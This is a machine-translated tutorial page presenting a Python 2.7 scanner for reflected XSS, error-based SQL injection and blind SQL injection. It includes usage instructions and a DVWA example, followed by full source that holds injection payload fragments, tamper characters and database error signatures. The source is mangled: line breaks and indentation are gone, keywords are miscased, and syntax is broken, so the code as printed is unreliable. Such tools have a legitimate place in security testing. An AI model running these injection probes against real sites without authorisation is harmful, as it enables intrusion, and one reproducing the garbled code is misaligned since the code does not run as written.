Python script implements Web vulnerability scanning Tool _python

Source: Internet
Author: User
Tags http cookie simple sql injection sql injection access database file permissions python script

This is done last year, a web vulnerability scanning gadget, mainly for simple SQL injection vulnerabilities, SQL blind and XSS vulnerabilities, the code is seen GitHub foreign great God (heard to be one of the writers of SMAP) two small tools source code, according to the idea of their own wrote. Here is the instructions and source code.

First, the use of instructions:

1. Operating Environment:

Linux command line interface +python2.7

2. Program Source:

Vim scanner//Create a file called scanner

Chmod a+xscanner//Modify file permissions as executable

3. Run the program:

Python scanner//Run files

If you do not carry the target URL information, the interface output Help information, reminders can be input parameters.

Parameters include:

--h Output Help information
--url-Scanned URLs
--data the parameters of the POST request method
--cookie HTTP request Header Cookie value
--user-agent HTTP request Header User-agent value
--random-agent whether to use browser camouflage
--referer the previous layer of the target URL
--proxy HTTP request Header proxy value

For example, scan "Http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"

Python scanner--url= "Http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"--cookie= "security=low; Phpsessid=menntb9b2isj7qha739ihg9of1 "

The output scan results are as follows:

The results show:

There is an XSS vulnerability, vulnerability Matching vulnerability feature Library "". xss.< "", belonging to a type outside the embedded label.

There is a SQL injection vulnerability where the target Web server's database type is mysql.

There is a blind SQL injection vulnerability.

Second, the source code:

Code verification can run, I personally recommend using DVWA test it.

#!-*-coding:utf-8-*-import Optparse, random, Re, string, Urllib, urllib2,difflib,itertools,httplib NAME = "Scanner for RXSS and sqli "AUTHOR =" Lishuze "prefixes = (" ",") "," ' "," ') "," \ "") Suffixes = ("", "---", "#") boolean_test S = ("and%d=%d", "OR Not (%d=%d)") Tamper_sql_char_pool = (' (', ', ') ', ' \ ', ' "', '" ') Tamper_xss_char_pool = (') ', ' "', ' 
> ', ' < ', '; ' Get, post = ' get ', ' post ' cookie, UA, REFERER = "Cookie", "user-agent", "REFERER" TEXT, Httpcode, TITLE, HTML = xrange (4 ) _headers = {} user_agents = ("mozilla/5.0" (X11; Linux i686; rv:38.0) gecko/20100101 firefox/38.0 "," mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/45.0.2454.101 safari/537.36 "," mozilla/5.0 (Macintosh; U Intel Mac OS X 10_7_0; En-US) applewebkit/534.21 (khtml, like Gecko) chrome/11.0.678.0 safari/534.21 "," Xss_patterns = (R <!--[^>]*% ( Chars) s|% ( Chars) s[^<]*--> "," \ "<!--.". XSS. '. -->\ ", Inside the comment", None), (R "(s)<script[^>]*>[^<]*? ' [^< ']*% (chars) s|% ( chars) s[^< ']* ' [^<]*</script> ', ' <script&gt '. XSS. '. </script>\ ", enclosed by <script> tags, inside single-quotes", None), (R ' s) <script[^>]*>[^<] *?" [^< "]*% (chars) s|% ( Chars) s[^< "]*" [^<]*</script> ', ' <script>.\ '. xss.\ ".</script>", enclosed by <script> tags, inside double-quotes ", None), (R" (s) <script[^>]*>[^<]*?% ( Chars) s|% ( Chars) s[^<]*</script> "," \ <script>.xss.</script>\ ", enclosed by <script> tags", None), (R ">[^<]*% (chars) s[^<]* (<|\z)", ">.xss.<\", outside of tags ", r" (s) <script.+?</script>| <!--. *?--> "), (r" <[^>]* ' [^> ']*% (chars) s[^> ']* ' [^>]*> ', "\". XSS. '. >\ ", inside the tag, inside Single-quotes", R "(s) <script.+?</script>|<!--. *?-->), (R ' <[^>]* "[^>"]*% (chars) s[^> "]*", "[^>]*>" <.\ "xss.\", .> the tag, insideE double-quotes ", R" (s) <script.+?</script>|<!--. *?--> "), (R" <[^>]*% (chars) s[^>]*> "," \ "<.xss.>\", inside the tag, outside of quotes ", R" (s) <script.+?</script>|<!--. *?-->)) Dbms_erro RS = {"MySQL": (r "SQL Syntax.*mysql", r "warning.*mysql_.*", r "valid MySQL result", R "mysqlclient\."), "Microsoft SQL Se RVer ": (r" driver.* sql[\-\_\]*server ", r" OLE db.* SQL Server ", r" (\w|\a) SQL Server.*driver ", r" warning.*mssql_.* ", R" (\w |\a) SQL Server.*[0-9a-fa-f]{8} ", R" (? s) exception.*\wsystem\. Data\. Sqlclient\. ", R" (s) exception.*\wroadhouse\. Cms\. ")," Microsoft Access ": (r" Microsoft Access Driver ", r" JET Database Engine ", r" Access database Engine ")," Oracle ": 
(r "Ora-[0-9][0-9][0-9][0-9]", r "Oracle error", R "Oracle.*driver", R "warning.*\woci_.*", R "warning.*\wora_.*")} def _retrieve_content_xss (URL, data=none): Surl= "" For I in Xrange (len (URL)): If I > Url.find ('? '): Surl+=surl.join (Url[i]). Replace ("", "%20") Else:surl+=surl.join (URl[i]) Try:req = Urllib2. Request (sURL, data, _headers) retval = Urllib2.urlopen (req, timeout=30). Read () except Exception, Ex:retval = GetAttr (E X, "message", "" "Return RetVal or" "Def _retrieve_content_sql (URL, data=none): retval = {httpcode:httplib. OK} surl= "" For I in Xrange (len (URL)): If I > Url.find ('? '): Surl+=surl.join (Url[i)). Replace (",%20") Else:sur L+=surl.join (url[i]) Try:req = Urllib2. Request (sURL, data, _headers) retval[html] = Urllib2.urlopen (req, timeout=30). Read () except Exception, EX:RETVAL[HTTPC ODE] = GetAttr (ex, "Code", None) retval[html] = GetAttr (ex, "message", "") match = Re.search (r) <title> (? p<result>[^<]+) </title> ", retval[html], re. I) Retval[title] = Match.group ("result") if match else None retval[text] = re.sub (? si) <script.+?</script>|&l t;! --. +?-->|<style.+?</style>|<[^>]+>|\s+ "," ", retval[html]) return retval def scan_page_xss (URL, Data=none): print "Start scanning RXss:\n "retval, usable = false, false URL = re.sub (r" = (&|\z) "," =1\g<1> ", url) if URL else URL data=re.sub (r) =  (&|\z) "," =1\g<1> ", data) if data else data try:for phase in (GET, POST): current = URL If phase be get else (Data or "") for the match in Re.finditer (R) (\a|[? /;]) (? p<parameter>[\w]+) =) (? p<value>[^&]+) ", current": found, usable = False, True print "scanning%s parameter '%s '"% (phase, Match.grou P ("parameter")) prefix = ("". Join (Random.sample (String.ascii_lowercase, 5)) suffix = ("". Join (Random.sample ( String.ascii_lowercase, 5)) if not found:tampered = Current.replace (match.group (0), "%s%s"% (Match.group (0), URLLIB.Q 
Uote ("%s%s%s%s"% ("'", Prefix, "" ". Join (Random.sample (Tamper_xss_char_pool, Len (tamper_xss_char_pool)), suffix))) Content = _RETRIEVE_CONTENT_XSS (tampered, data) if phase is get else _retrieve_content_xss (URL, tampered) for sample in R E.finditer ("%s" ([^]+?) %s "% (prefix, suffix), content, re. I): #print sample. Group () for Regex, info, content_removal_regex in xss_patterns:context = Re.search (regex% {"chars": re.escape (Sample. Group (0))}, Re.sub (Content_removal_regex or "", "", content), re. I) If context and not found and Sample.group (1). Strip (): PRINT "!!! %s parameter '%s ' appears to be XSS vulnerable (%s)% (phase, Match.group ("parameter"), info) found = RetVal = True If Not Usable:print "(x) no usable get/post parameters found" except Keyboardinterrupt:print "\ r (x) ctrl-c pressed" R Eturn retval def scan_page_sql (URL, data=none): print "Start scanning sqli:\n" retval, usable = false, false URL = Re.  Sub (r "= (&|\z)", "=1\g<1>", url) if URL else url data=re.sub (r "= (&|\z)", "=1\g<1>", data) if data else Data try:for phase in (GET, POST): current = URL If phase are get else (data or "") for the match in Re.finditer (R) (\a|[ ?;]) (? p<parameter>\w+) =) (? p<value>[^&]+) ", current): vulnerable, usable = False, True original=none print" ScanNing%s parameter '%s '% (phase, Match.group ("parameter")) tampered = Current.replace (match.group (0), "%s%s"% (match.gr OUP (0), Urllib.quote ("". Join (Random.sample (Tamper_sql_char_pool, Len (Tamper_sql_char_pool)))) content = _retrieve _content_sql (tampered, data) if phase is get else _retrieve_content_sql (URL, tampered) for (DBMS, Regex) in ((DBMS, regex For the DBMS in dbms_errors for regex in Dbms_errors[dbms]): If not vulnerable and re.search (regex, content[html), re. I): PRINT "!!! %s parameter '%s ' could be error sqli vulnerable (%s)% (phase, Match.group ("parameter"), DBMS) retval = vulnerable = Tr UE vulnerable = False Original = original or (_retrieve_content_sql (current, data) if phase are get else _retrieve_conten T_sql (URL, current) to Prefix,boolean,suffix in Itertools.product (prefixes,boolean_tests,suffixes): If not Vulnerable:template = "%s%s%s"% (prefix,boolean, suffix) payloads = Dict ((_, Current.replace (Match.group (0), "%s%s"% (Match.group (0), Urllib.quote (tEmplate% (1 if _ Else 2, 1), safe= '% '))) contents = Dict ((_, _retrieve_content_sql (Payloads[_), Data) If phase is get else _retrieve_content_sql (URL, payloads[_]) for _ In (False, True) if all (_[httpcode] for _ in (Original, Contents[true], Contents[false]) and (any (original[_] = = Contents[true][_]!= Contents[false][_] with _ In (Httpcode, TITLE)): vulnerable = True Else:r Atios = Dict (_, Difflib. Sequencematcher (None, Original[text], Contents[_][text]). Quick_ratio ()) for _ In (True, False) vulnerable = all (ratios. Values ()) and ratios[true] > 0.95 and Ratios[false] < 0.95 if vulnerable:print "!!!  
%s parameter '%s ' could be error blind sqli vulnerable "% (phase, Match.group (" parameter ")) RetVal = True if not usable: Print "(x) no usable get/post parameters found" except Keyboardinterrupt:print "\ r (x) ctrl-c pressed" return Retva L def init_options (Proxy=none, Cookie=none, Ua=none, Referer=none): global _headers _headers = Dict (filtER (lambda _: _[1], ((Cookie, Cookie), (UA, UA or NAME), (REFERER, REFERER)) Urllib2.install_opener (Urllib2.build_opener (Urllib2. Proxyhandler ({' HTTP ': proxy})) if proxy else None) if __name__ = = "__main__": Print----------------------------------- -----------------------------------------------"print"%s\nby:%s "% (NAME, AUTHOR) print"-------------------------- --------------------------------------------------------"parser = Optparse. Optionparser () parser.add_option ("--url", dest= "url", help= "Target url") parser.add_option ("--data", dest= "data", help= "POST data") parser.add_option ("--cookie", dest= "Cookie", help= "HTTP Cookie Header Value") Parser.add_option ("- User-agent ", dest=" UA ", help=" HTTP user-agent Header Value ") parser.add_option ("--random-agent ", dest=" Randomagent ", Action= "Store_true", help= "use randomly selected HTTP user-agent header value") parser.add_option ("--referer", dest= " Referer ", help=" HTTP referer header Value ") parser.add_option ("--proxy ", dest="Proxy ", help=" HTTP proxy address ") options, _ = Parser.parse_args () if Options.url:init_options (Options.proxy, Options . Cookies, options.ua if not options.randomagent else Random.choice (user_agents), options.referer) result_xss= Scan_page_  XSS (Options.url if Options.url.startswith ("http") Else "http://%s% Options.url, options.data) print" \nscan:%s Vulnerabilities found "% (" possible "if RESULT_XSS else" no ") print"-------------------------------------------------- --------------------------------"Result_sql = Scan_page_sql (Options.url if Options.url.startswith (" http ") Else" http ://%s "% Options.url, options.data) print" \nscan results:%s vulnerabilities found "% (" possible "if result_sql else" no ") print"----------------------------------------------------------------------------------"Else:parser.print_ Help ()

The above is a small series to introduce the Python script to implement the Web Vulnerability scanning Tool, I hope to help you, if you have any questions please give me a message, small series will promptly reply to everyone. Here also thank you very much for the cloud Habitat Community website support!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.